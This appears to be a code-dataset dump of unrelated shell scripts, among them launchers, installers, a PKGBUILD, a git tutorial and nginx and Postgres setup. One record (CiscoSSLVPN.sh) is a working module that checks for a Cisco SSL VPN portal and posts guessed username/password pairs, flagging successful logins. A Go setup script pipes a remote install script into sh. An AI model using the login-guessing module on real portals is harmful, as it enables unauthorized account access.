blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
87a2d2c78f2a12618449c4ad472c6afc930c09e2
|
Shell
|
scriptlib/sh
|
/totalcmd
|
UTF-8
| 991
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh
###totalcmd v0.1
### - totalcmd
### - Written by duel, 2008-12-24
###Usage:
### totalcmd
###Option:
### -h Display help text
###Example:
### totalcmd
#resume=`/myplace/wine/bin/get-appdefault.pl "TotalCmd.exe"`
#/myplace/wine/bin/del-appdefault.pl "TotalCmd.exe"
#/myplace/wine/bin/set-appdefault.pl "TotalCmd.exe" browseui,ole32,oleaut32,rpcrt4,shlwapi,msvcrt=b | regedit -
#sleep 1
#DLLOVERRIDES='rpcrt4=b' cn_wine 'R:\Program\Fileman\TotalCmd\TotalCmd.exe'
#sleep 1
#echo -E "$resume" | regedit -
# Detect 64-bit Windows: either running under WOW64 (ARCHITEW6432) or natively.
arch=32
if [ "AMD64" = "$PROCESSOR_ARCHITEW6432" ] ; then arch=64 ; fi
if [ "AMD64" = "$PROCESSOR_ARCHITECTURE" ] ; then arch=64 ; fi
# Pick the matching Total Commander binary and its install directory.
if [ "$arch" = "64" ] ; then
  appdir=$(cygpath -u "$FS_SYSTEM_APP")
  appname="totalcmd64.exe"
else
  appdir=$(cygpath -u "$FS_SYSTEM")
  appdir="$appdir/app32"
  appname="totalcmd.exe"
fi
app="$appdir/fileman/totalcmd/$appname"
# Quote $app so a path containing spaces is printed as one word.
echo "$app" "$@"
# Fixes: '==' is not POSIX sh (script is #!/bin/sh) -- use '='.
# 'exec cmd &' was contradictory: exec is meaningless for a backgrounded
# command, so simply background it on cygwin and exec through wine elsewhere.
if [ "$OSTYPE" = "cygwin" ] ; then
  "$app" "$@" &
else
  exec cn_wine "$app" "$@"
fi
| true
|
6c0e9d409e22e0fdd445f014f92886a3f55dca4d
|
Shell
|
castocolina/scripts
|
/common/install_golang.sh
|
UTF-8
| 1,405
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# Install (or optionally upgrade) the Go toolchain via Homebrew, configure
# GOPATH in the user's shell config, and fetch a standard set of Go dev tools.
BASEDIR=$(dirname "$0")
# Prime the sudo credential cache up front so later commands don't prompt.
sudo echo "Test sudo"
# exist_cmd / is_true / find_append / get_os are presumably defined in
# install_func.sh -- verify against that file.
source $BASEDIR/install_func.sh
source $MY_SH_CFG_FILE
MY_OS=$(get_os)
echo
echo $SEPARATOR
echo ">>>>> GOLANG ................"
echo $SEPARATOR
echo -n "UPDATE? (y/n) > "
read to_update
# Install Go if missing; upgrade only when the user answered yes.
exist_cmd go || brew install golang
exist_cmd go && is_true $to_update && brew upgrade golang;
exist_cmd go && is_true $to_update && {
mkdir -p $HOME/go;
# Quoted heredoc delimiter: $HOME/$GOPATH are written literally into the
# config file and only expanded when the shell config is sourced.
GOLANG_CONFIG=$(cat <<'EOF'
export GOPATH="$HOME/go";
export PATH="$PATH:$GOPATH/bin";
EOF
);
find_append $MY_SH_CFG_FILE "GOPATH=" "$GOLANG_CONFIG"
source $MY_SH_CFG_FILE
mkdir -p $GOPATH/src $GOPATH/pkg $GOPATH/bin
# NOTE(review): piping a remote script straight into sh is a supply-chain
# risk -- consider downloading and inspecting first.
curl https://raw.githubusercontent.com/golang/dep/master/install.sh | sh
go get -u -v github.com/rakyll/gotest
#Go debugger
go get -u -v github.com/go-delve/delve/cmd/dlv;
# Go lint
go get -u -v github.com/golangci/golangci-lint/cmd/golangci-lint;
go get -u -v github.com/ramya-rao-a/go-outline;
go get -u -v github.com/rogpeppe/godef;
go get -u -v github.com/uudashr/gopkgs/cmd/gopkgs;
go get -u -v github.com/sqs/goreturns;
go get -u -v github.com/mdempsky/gocode;
go get -u -v github.com/vektra/mockery;
go get -u -v github.com/golang/mock/gomock;
go get -u -v github.com/matryer/moq;
go get -u -v golang.org/x/tools/cmd/gorename;
go install github.com/golang/mock/mockgen;
};
echo ":: $SEPARATOR"
go version
echo ":: $SEPARATOR"
| true
|
62a8901f5a27f6bb0a9ddbde55c783d62f031905
|
Shell
|
mikhbur/conformer
|
/modules/CiscoSSLVPN.sh
|
UTF-8
| 5,946
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Probe https://$1 to confirm it serves a Cisco SSL VPN (WebVPN) login page.
# Any of $5..$8 may be the literal option "disable_check" to skip detection.
# Side effect: sets the global old_ver=true when only the legacy
# (webvpn.html) portal layout is found; exits 1 when neither layout matches.
check_ciscoSSLVPN(){
old_ver=false;
check_Portal=$(wget --timeout=4 -qO- https://$1/+CSCOE+/logon.html --no-check-certificate);
if ([ "$(echo "$check_Portal" | grep 'name="username"')" ] && [ "$(echo "$check_Portal" | grep 'name="password"')" ] && [ "$(echo "$check_Portal" | grep 'name="Login"')" ]) || [[ $(echo "$5" | tr '[:upper:]' '[:lower:]' ) == "disable_check" ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] ; then
:
else
#Check for older version 2010?
check_Portal=$(wget --timeout=4 -qO- https://$1/webvpn.html --no-check-certificate);
if ([ "$(echo "$check_Portal" | grep "username")" ] && [ "$(echo "$check_Portal" | grep "password")" ] && [ "$(echo "$check_Portal" | grep "Login")" ]) || [[ $(echo "$5" | tr '[:upper:]' '[:lower:]' ) == "disable_check" ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] ; then
old_ver=true;
echo "";
echo "***This Version of CiscoSSLVPN is older, Module for this portal is incomplete and might show false positives***";
echo "";
else
echo "Either not a CiscoSSLVPN portal, or not compatible version.";
echo "Exiting...";
exit 1;
fi
fi
}
# Attempt one login POST against the portal at $1 using the globals $line
# (username) and $pass (password) -- presumably set by the caller's wordlist
# loop; verify against the calling module.
# Options in $5..$8: "log=<file>" enables result logging, "debug=<file>"
# dumps full HTTP responses. Reads the global old_ver set by
# check_ciscoSSLVPN to pick the portal layout.
POST_ciscoSSLVPN(){
LOG_YES=false;
LOG=/tmp/conformer.log;
#Determine if Logging, and where to log
if [[ $(echo "$5" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "log="* ]]; then
LOG_YES=true;
# Take the log path from whichever positional argument carried it.
LOG=$(echo "$5" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$6" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$7" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$8" | grep -i log | cut -d "=" -f 2);
fi
fi
fi
# A directory is not a usable log file -- disable logging in that case.
if [[ -d "$LOG" ]] ; then
LOG_YES=false;
fi
fi
DEBUG_YES=false;
DEBUG=/tmp/conformer.debug;
#Determine if Debuging, and where to debug to.
if [[ $(echo "$5" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "debug="* ]]; then
DEBUG_YES=true;
DEBUG=$(echo "$5" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$6" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$7" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$8" | grep -i debug | cut -d "=" -f 2);
fi
fi
fi
if [[ -d "$DEBUG" ]] ; then
DEBUG_YES=false;
fi
fi
#check which version.
if [[ "$old_ver" != true ]] ; then
#Curl sends POST parameters to SSLVPL Portal
POST=$(curl -i -s -k -X $'POST' \
-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Referer: https://'$1'/+CSCOE+/logon.html?a0=15&a1=&a2=&a3=1' -H $'Content-Type: application/x-www-form-urlencoded' \
-b $'webvpnlogin=1; webvpnlogin=1; webvpnLang=en' \
--data-binary $'tgroup=&next=&tgcookieset=&username='$line'&password='$pass'&Login=Login' \
$'https://'$1'/+webvpn+/index.html');
#If Logging is enabled loop userlist
if [[ $DEBUG_YES == true ]]; then
echo "host:$1 username:$line password:$pass" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "$POST" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "-------------------------------------------------------------" >> "$DEBUG";
fi
#checks if cookies returned or left empty or if default return html presented.
if [[ $POST != *"webvpnc=;"* ]] && [[ $POST == *"webvpnc="* ]] ; then
echo " $line:$pass:**Success**";
# Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:**Success**" >> "$LOG";
fi
elif [[ $POST != *"webvpnc=;"* ]]; then
echo " $line:$pass:Fail --- Page not responding properly.";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail --- Page not responding properly." >> "$LOG";
fi
else
echo " $line:$pass:Fail";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail" >> "$LOG";
fi
fi
else #Older version POST.
#Curl sends POST parameters to older SSLVPL Portal
POST=$(curl -i -s -k -X $'POST' \
-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Referer: https://'$1'/webvpn.html' -H $'Content-Type: application/x-www-form-urlencoded' \
-b $'webvpncontext=00@websslvpn; webvpnlang=1; stStarted=0' \
--data-binary $'username='$line'&password='$pass'&Login=Login&next=' \
$'https://'$1'/webvpn.html');
#If Logging is enabled loop userlist
if [[ $DEBUG_YES == true ]]; then
echo "host:$1 username:$line password:$pass" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "$POST" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "-------------------------------------------------------------" >> "$DEBUG";
fi
# Legacy layout: a "msgLoginFail" marker means rejected credentials.
if [[ $POST == *"msgLoginFail"* ]] ; then
echo " $line:$pass:Fail";
#Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail" >> "$LOG";
fi
elif [[ $POST != *"msgLoginFail"* ]] && [[ $POST != "" ]] ; then
echo " $line:$pass:**Success**";
# Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:**Success**" >> "$LOG";
fi
else
echo " $line:$pass:Fail --- Page not responding properly.";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail --- Page not responding properly." >> "$LOG";
fi
fi
fi
}
| true
|
2d4777262eeda1c5059c7f9bd43510ba9bc5caa5
|
Shell
|
saurabhnikam1997/ProgrammingConstructs11
|
/@Day7/Secndlargesmallwtsort.sh
|
UTF-8
| 969
| 4
| 4
|
[] |
no_license
|
#! /bin/bash -x
# -x: trace every command as it runs (this demo script is intentionally verbose).
# Global array shared by numberGenerate and the Second* reporting functions.
declare -a array
# Fill the global 'array' with ten random three-digit numbers (100..999)
# and echo the generated contents.
function numberGenerate()
{
local idx
for (( idx = 0; idx < 10; idx++ ))
do
array[idx]=$(( (RANDOM % 900) + 100 ))
done
echo
echo Generate Array.. ${array[@]}
echo
}
# Print the largest and second-largest values among the arguments.
# Fixes: the elif assigned to the misspelled variable 'SecondLarest', so the
# runner-up was never tracked, and the comparison referenced the variable
# without '$'; also fixed the "Sdcond" typo in the output message.
function SecondLargest()
{
largest=$1
SecondLargest=$1
for m in $*
do
if [[ $m -gt $largest ]]
then
# New maximum: previous maximum becomes the runner-up.
SecondLargest=$largest
largest=$m
elif [[ $m -gt $SecondLargest && $m -ne $largest ]]
then
SecondLargest=$m
fi
done
echo Largest Element Of Array Is.. $largest
echo Second Largest Element Of Array Is.. $SecondLargest
echo
}
# Print the smallest and second-smallest values among the arguments.
# Fixes: the elif compared against the misspelled, unset 'SecondSmallestm'
# (arithmetic 0 in [[ ]]), so the runner-up was never tracked; also fixed
# the "Samllest" typo in the output message.
function SecondSmallest
{
smallest=$1
SecondSmallest=$1
for m in $*
do
if [[ $m -lt $smallest ]]
then
# New minimum: previous minimum becomes the runner-up.
SecondSmallest=$smallest
smallest=$m
elif [[ $m -lt $SecondSmallest && $m -ne $smallest ]]
then
SecondSmallest=$m
fi
done
echo Smallest Element Of Array Is.. $smallest
echo Second Smallest Element of Array Is.. $SecondSmallest
echo
}
# Drive the demo: build the random array, then report its extremes.
numberGenerate
SecondLargest ${array[@]}
SecondSmallest ${array[@]}
| true
|
373f3e984fb8d65cb31095740f28c0ba16602593
|
Shell
|
petronny/aur3-mirror
|
/lzma-sdk/PKGBUILD
|
UTF-8
| 1,644
| 2.625
| 3
|
[] |
no_license
|
# Arch Linux PKGBUILD for the LZMA SDK (.NET assembly + Java jar).
pkgname=lzma-sdk
pkgver=9.22
pkgrel=1
pkgdesc="The LZMA SDK provides the libraries you need to develop applications that use LZMA compression."
url="http://www.7-zip.org/sdk.html"
arch=(any)
license=("public domain")
makedepends=(java-environment mono)
conflicts=(lzma)
optdepends=("java-environment: Java SDK"
"mono: .NET SDK")
source=("http://downloads.sourceforge.net/sevenzip/lzma${pkgver//./}.tar.bz2"
"SevenZip.snk"
"sevenzip.pc")
sha1sums=('fbe4d6c02202d65fae75c2db0e3cdc542ca41e6d'
'eaa62fd2889445845c73645f188c189d2227c3df'
'd1c5afd480d664634b0d46d3156bbe762435a2f6')
# Drop command-line/benchmark sources that are not part of the SDK libraries.
prepare() {
cd "$srcdir"
rm CS/7zip/Common/CommandLineParser.cs
rm Java/SevenZip/Lzma{Alone,Bench}.java
}
# Build SevenZip.dll with mono's mcs and compile the Java classes into 7zip.jar.
build() {
cd "$srcdir/CS/7zip"
mcs /out:SevenZip.dll /keyfile:../../SevenZip.snk /t:library /debug:pdbonly /optimize \
ICoder.cs `ls Common/*.cs` `ls Compress/LZ/*.cs` `ls Compress/LZMA/*.cs` `ls Compress/RangeCoder/*.cs`
cd ../../Java/SevenZip
mkdir .build
javac -d .build *.java Compression/LZ/*.java Compression/LZMA/*.java Compression/RangeCoder/*.java
cd .build
jar cvf 7zip.jar SevenZip/Compression/LZ SevenZip/Compression/LZMA SevenZip/Compression/RangeCoder \
SevenZip
}
# Install artifacts under /usr/lib/lzma-sdk, substitute the pkg-config
# version placeholder, and register the assembly in the GAC under $pkgdir.
package() {
cd "$srcdir/CS/7zip"
find . -name '*.dll*' -exec install -Dm644 {} "$pkgdir/usr/lib/lzma-sdk/"{} \;
install -m644 ../../Java/SevenZip/.build/7zip.jar "$pkgdir/usr/lib/lzma-sdk/"
install -Dm644 ../../sevenzip.pc "$pkgdir/usr/lib/pkgconfig/sevenzip.pc"
find "$pkgdir/usr/lib/pkgconfig" -type f -exec sed -i "s|@VERSION@|${pkgver}|" {} \;
cd "$pkgdir/usr/lib/lzma-sdk"
gacutil -i SevenZip.dll -root "$pkgdir/usr/lib"
}
| true
|
de29af4d4dd82c91d1b3e7d95cc2a6524edf9468
|
Shell
|
pawelKapl/git-tutorial
|
/git.04.resolve.conflicts
|
UTF-8
| 4,002
| 3.375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#################################################################################
# #
# Copyright 2016 Augustyn Kończak #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
#################################################################################
##Config: file and branch used to manufacture the merge conflict.
conflict="file_with_conflict";
branchname="development";
##Commands: stored as strings and executed later via eval.
createbranch="git branch ${branchname}";
modifyfile="echo $(date +"%s") > ${conflict}"
add="git add ${conflict}"
commit="git commit -m \"creating conflicts\""
switchtobranch="git checkout ${branchname}"
switchtomaster="git checkout master"
merge="git merge ${branchname}";
mergetool="git mergetool meld";
##Helpers: the three file contents that will collide on merge.
msg01="this is example line that might generate conflicts"
msg1="echo ${msg01} > ${conflict}";
msg02="this is example line that will not gnerate conflicts"
msg2="echo ${msg02} > ${conflict}";
msg03="this is line that will cause all conflicts"
msg3="echo ${msg03} > ${conflict}";
# Prefer meld as the graphical merge tool; fall back to vimdiff when absent.
meld="$(whereis meld|awk -F':' '{print $2}')";
if [ "x$meld" == "x" ]; then
meld="vimdiff";
else
meld="meld";
fi
timestamp=$(date +"%H%M%S");
# ANSI colour escapes used by the tutorial text below.
esc="\033[0m"
command="\033[36;40m"
bashtxt="\033[37;40m";
bold="\033[31;40m";
soft="\033[33;40m"
echo -e "\n\033[32;40;1mResolving conflicts${esc}\n"
# Fix: this line referenced the undefined variable ${strong}; the emphasis
# colour actually defined in the colour setup is ${bold}.
echo -e "${bold}Conflict${esc} is when we have change to the ${soft}same file${esc}, the ${soft}same line${esc}, it two diffrent branches.";
echo -e "Not as uncommon as one would like\n";
read;
echo -e "We are going to generate conflict so you can learn how to deal with it in git";
echo -e "This script will create new branch ${soft}${branchname}${esc} with file ${soft}${conflict}${esc} to create within conflict";
echo -e "Than it will change the same file in master branch so we acctually ${soft}have${esc} conflict";
echo -e "Preforming magic, please wait...\n";
# Manufacture the conflict: two commits on the branch, one on master.
echo -e "$(eval ${createbranch}) $(eval ${switchtobranch})";
echo -e "$(eval ${msg1})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
sleep 2;
echo -e "$(eval ${msg2})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
sleep 2;
echo -e "$(eval ${switchtomaster})";
echo -e "$(eval ${msg3})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
echo -e "\nWe should have conflict now, when we try to perform merge of two branches. To do merge of ${branchname} to master use command ${command}${merge}${esc}.\nWe'll try this now.\nHold your fingers for me ;)";
read;
echo -e "$(eval ${merge})";
echo -e "\nSo, let's fire ${soft}mergetool${esc}\nI'm lazy, so I'll try to use graphical tool. You can of course use your favourite ${soft}vimdiff${esc}";
echo -e "Nevertheless, git writes about possible mergetools just after invoking ${command}${merge}${esc}"; echo -e "$(eval ${mergetool})";
read;
# Chain into the next tutorial script, wherever it lives relative to CWD.
if [ -f git.05.working.with.multiple.repositories ];then
. git.05.working.with.multiple.repositories;
else
. ../git.05.working.with.multiple.repositories;
fi
| true
|
8eccde26bda9d3885031ef1a08e8be2477815a4a
|
Shell
|
CrunchyData/crunchy-containers
|
/bin/postgres_common/postgres/custom-configs.sh
|
UTF-8
| 1,002
| 3.390625
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
CRUNCHY_DIR=${CRUNCHY_DIR:-'/opt/crunchy'}
source "${CRUNCHY_DIR}/bin/common_lib.sh"
enable_debugging
# Copy a user-supplied config file into place when one has been mounted.
#   $1 - source path (required)
#   $2 - destination path (required)
#   $3 - octal file mode to apply to the destination (required)
# Does nothing when $1 does not exist; echo_info / err_check come from
# common_lib.sh sourced above.
function custom_config() {
    src=${1?}
    dest=${2?}
    mode=${3?}
    if [[ -f ${src?} ]]
    then
        echo_info "Custom ${src?} detected. Applying custom configuration.."
        # Fix: quote the expansions so paths containing spaces are not
        # word-split into multiple cp/chmod arguments.
        cp "${src?}" "${dest?}"
        err_check "$?" "Applying custom configuration" "Could not copy ${src?} to ${dest?}"
        chmod "${mode?}" "${dest?}"
        err_check "$?" "Applying custom configuration" "Could not set mode ${mode?} on ${dest?}"
    fi
}
# Apply each optional custom config/cert mounted under /pgconf, mode 600.
custom_config "/pgconf/postgresql.conf" "${PGDATA?}/postgresql.conf" 600
custom_config "/pgconf/pg_hba.conf" "${PGDATA?}/pg_hba.conf" 600
custom_config "/pgconf/pg_ident.conf" "${PGDATA?}/pg_ident.conf" 600
custom_config "/pgconf/server.key" "${PGDATA?}/server.key" 600
custom_config "/pgconf/server.crt" "${PGDATA?}/server.crt" 600
custom_config "/pgconf/ca.crt" "${PGDATA?}/ca.crt" 600
custom_config "/pgconf/ca.crl" "${PGDATA?}/ca.crl" 600
| true
|
575f16876959d561efeac748567ebdd2fbe242dd
|
Shell
|
kevincoakley/workbench-helm-chart
|
/generate-self-signed-cert.sh
|
UTF-8
| 892
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# This script will generate a self-signed TLS certificate for the given domain. If no domain is specified, the user will be prompted for one.
#
# Usage: ./generate-self-signed-cert.sh [domain]
#
ECHO="echo -e"
domain="$1"
mkdir -p certs/
# Prompt interactively when no domain was passed on the command line.
if [ "$domain" == "" ]; then
$ECHO "Please specify a domain for your new certificate."
read -p "Domain: " domain
fi
# Still no domain? Exit with error..
if [ "$domain" == "" ]; then
$ECHO "You must specify a domain"
exit 1
fi
# Only generate when no certificate exists yet: 10-year validity, 2048-bit
# RSA key, wildcard CN for the domain.
if [ ! -f "certs/${domain}.cert" ]; then
$ECHO "\nGenerating self-signed certificate for $domain"
openssl req -new -x509 -nodes -sha1 -days 3650 -subj "/C=US/ST=IL/L=Champaign/O=NCSA/OU=NDS/CN=*.$domain" -newkey rsa:2048 -keyout "certs/$domain.key" -out "certs/$domain.cert"
else
$ECHO "Certificate already exists for $domain... skipping generation of self-signed certificate"
fi
| true
|
8c1a461051d4e3681d22e0cd5a6ef023b8cb1f3c
|
Shell
|
MeiChihChang/Applied-Security-Lab-Student-Project-ETHZ
|
/scripts/export.sh
|
UTF-8
| 678
| 2.96875
| 3
|
[] |
no_license
|
# WINDOWS SCRIPT: change VBoxManage.exe to vboxmanage when running on Linux.
# Comment out the cd below if VBoxManage.exe is already in the PATH.
cd 'C:\Program Files\Oracle\VirtualBox\'
VBoxManage.exe list vms | tac
echo "-"
# Iterate over every token of each registered VM entry, in reverse order,
# and print those whose name matches one of the lab machine roles.
for vm in `VBoxManage.exe list vms | tac`;
do
for i in $(echo $vm | tr " " "\n")
do
if [[ $i == *"host"* || $i == *"firewall"* || $i == *"client"* || $i == *"admin"* ]]; then
echo $i
#printf "Halting $vm\n"
#VBoxManage.exe controlvm "$i" acpipowerbutton 2> /dev/null
#printf "Exporting $vm\n"
#VBoxManage.exe export "$i" -o "./build/$i.ova"
fi
done
done
# Drop into a shell so the window stays open when launched by double-click.
$SHELL
| true
|
bc26a8d2cb8a82c1ecf97e3e0a6a7c75191fbcc0
|
Shell
|
aaronzirbes/httpie-json-scripts
|
/find
|
UTF-8
| 656
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Query the entity gateway for the nearest $countStr entities of a service
# type around a latitude/longitude, via httpie.
# Usage: ./find <service> <lat> <lon>
# getUrl and HEADERS are presumably provided by host.include -- verify.
. host.include
countStr=3
service=$1
lat=$2
lon=$3
if [ "$service" == "" ]; then
echo "You must supply a service name"
exit 1
fi
# No latitude given: show an example invocation and bail out.
if [ "$lat" == "" ]; then
echo "You must supply a latitude and longitude"
lat=45.831335
lon=-95.383322
echo " for example: ./find dealer $lat $lon"
exit 1
fi
if [ "$lon" == "" ]; then
echo "You must supply a latitude and longitude"
exit 1
fi
path="/by-location/${countStr}@${lat},${lon}"
# https://github.com/jkbr/httpie
BASE_URL=`getUrl entity-gateway ${service}`/${service}s
echo "http GET ${BASE_URL}${path} ${HEADERS}"
time http GET ${BASE_URL}${path} ${HEADERS}
| true
|
f83560238afeeb2f8e977051b095b95d3baddd39
|
Shell
|
ValdrST/vrtg
|
/crearSitio.sh
|
UTF-8
| 2,016
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Ask which server (by number) the new site belongs to.
echo "Indique el número de servidor:"
echo "1. venganzaiii.somch.org"
echo "2. somch.org"
read numeroServidor
# Map the choice to a hostname; abort on anything else.
case ${numeroServidor} in
"1")
ip=venganzaiii.somch.org
;;
"2")
ip=somch.org
;;
*)
echo "Servidor no válido"
exit 1
;;
esac
# Ask for the port to listen on.
echo "***********************************"
echo "Puerto [8008,8009,8010,8011,8012,8013,8014,8015,8016,8017]:"
read numeroPuerto
# Abort if something is already listening on that port.
estadoPuerto=`netstat -tuln | grep LISTEN | grep -c :$numeroPuerto`
if [ $estadoPuerto -ge 1 ]
then
echo "Abortando: El puerto $numeroPuerto ya se encuentra en uso"
exit 1
fi
# Install, start and enable the vrtgd systemd unit.
cp vrtgd.service /etc/systemd/system/
systemctl daemon-reload
sudo systemctl start vrtgd
sudo systemctl enable vrtgd
# Ask for the directory name for the new site.
echo "***********************************"
echo "Directorio para el sitio a crear:"
read nombreDirectorio
# Derive the nginx config path and web-root path for this site.
archivoConfiguracionNGINX=/etc/nginx/sites-available/$nombreDirectorio-proxy.conf
directorioSitioNGINX=/usr/share/nginx/html/$nombreDirectorio-proxy
# Start from a clean slate (the touch/rm pair just guarantees removal).
touch $archivoConfiguracionNGINX
rm -rf $archivoConfiguracionNGINX
rm -rf $directorioSitioNGINX
# Write the nginx server block, proxying /vrtg to the waitress socket.
echo "server{
listen $numeroPuerto;
server_name $ip;
location /vrtg {
proxy_pass http://unix:/run/waitress/vrtg.sock;
}
}" > $archivoConfiguracionNGINX
# Create nginx's working directory for the site.
mkdir $directorioSitioNGINX
# Create the symbolic link in sites-enabled.
sitesEnabledConfig="/etc/nginx/sites-enabled/$nombreDirectorio-proxy.conf"
# Fix: the old test used -d, which is false for a symlink to a regular file,
# so a stale link was never removed and the ln -s below failed on re-runs.
# -L catches dangling symlinks too; -e catches a plain file at that path.
if [ -L "$sitesEnabledConfig" ] || [ -e "$sitesEnabledConfig" ];then
rm "$sitesEnabledConfig"
fi
sitesAvailableConfig="/etc/nginx/sites-available/$nombreDirectorio-proxy.conf"
ln -s "$sitesAvailableConfig" "$sitesEnabledConfig"
# Give nginx's user ownership and restricted permissions on the web root.
chown -R http:http $directorioSitioNGINX
chmod 750 $directorioSitioNGINX
# Reload nginx so the new site goes live.
systemctl reload nginx
| true
|
bbae554f30cf669ae4db21651156ca8b52f1be0c
|
Shell
|
DeltaF1/noodle
|
/build.sh
|
UTF-8
| 420
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh -e
# Build the noodle ROM with uxnasm, optionally install/push it, then run it.
echo "Cleaning.."
rm -rf bin
mkdir bin
echo "Assembling.."
uxnasm src/main.tal bin/noodle.rom
echo "Installing.."
# Copy the ROM into ~/roms only when that directory exists and the build
# actually produced a ROM file.
if [ -d "$HOME/roms" ] && [ -e ./bin/noodle.rom ]
then
cp ./bin/noodle.rom $HOME/roms
echo "Installed in $HOME/roms"
fi
# With --push as the first argument, upload the ROM to itch.io via butler.
if [ "${1}" = '--push' ];
then
echo "Pushing.."
~/Applications/butler push bin/noodle.rom hundredrabbits/noodle:uxn
fi
echo "Running.."
uxnemu bin/noodle.rom
| true
|
6d4ff9ff2a69d9e03c214ccf81364f7422aed086
|
Shell
|
bargassa/Stop4Body
|
/Macros/StepN_BDTOutFits.sh
|
UTF-8
| 722
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Run BDTStudy fits over the BDT output trees for three JSON configurations,
# creating the output directories as needed.
. setupJSONs.sh
. setupPaths.sh
INPUT=${TEST_DIR}_bdt/
OUTPUT=~cbeiraod/local-area/Stop4Body/BDT_Fits/
OUTPUT_INJ=~cbeiraod/local-area/Stop4Body/BDT_Fits_Injected/
OUTPUT_DAT=~cbeiraod/local-area/Stop4Body/BDT_Fits_Data/
if [[ ! -d ${OUTPUT} ]] ; then
mkdir -p ${OUTPUT}
fi
if [[ ! -d ${OUTPUT_INJ} ]] ; then
mkdir -p ${OUTPUT_INJ}
fi
if [[ ! -d ${OUTPUT_DAT} ]] ; then
mkdir -p ${OUTPUT_DAT}
fi
# One BDTStudy pass per configuration; all read the same input trees.
# NOTE(review): plot2016_LO writes to the _Data directory while
# plot2016_PD_LO writes to the plain one -- confirm this mapping is intended.
BDTStudy --json ${JSON_PATH}/plot2016_LO.json --outDir ${OUTPUT_DAT} --inDir ${INPUT} --suffix bdt
BDTStudy --json ${JSON_PATH}/plot2016_PDInj_LO.json --outDir ${OUTPUT_INJ} --inDir ${INPUT} --suffix bdt
BDTStudy --json ${JSON_PATH}/plot2016_PD_LO.json --outDir ${OUTPUT} --inDir ${INPUT} --suffix bdt
| true
|
00516b952b61f123f3d554c70fc4549cef6c6873
|
Shell
|
abitwise/dotfiles
|
/.bash_profile
|
UTF-8
| 3,657
| 3.171875
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
# macOS interactive Bash profile: PATH setup, shell options, completions,
# and per-tool environment configuration.
# Add /usr/local/sbin to path
export PATH=/usr/local/sbin:$PATH;
# Add `~/bin` to the `$PATH`
export PATH="$HOME/bin:$PATH";
# Add Python 3 bins to path
export PATH="$HOME/Library/Python/3.6/bin:$PATH";
# Load the shell dotfiles, and then some:
